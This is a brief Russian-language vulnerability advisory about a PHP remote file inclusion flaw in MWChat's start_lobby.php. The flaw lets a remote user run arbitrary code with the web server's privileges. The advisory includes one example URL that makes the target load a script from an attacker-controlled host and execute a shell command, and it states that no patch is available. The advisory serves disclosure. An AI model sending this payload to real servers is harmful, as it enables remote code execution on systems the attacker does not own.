PHP-инклюдинг в сценарии start_lobby.php в MWChat

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре '$CONFIG[MWCHAT_Libs]' сценария 'start_lobby.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/mwchat/libs/start_lobby.php?CONFIG
[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=u name%20-a

URL производителя: www.appindex.net/products/detail/?product=mwchat

Решение: Способов устранения уязвимости не существует в настоящее время.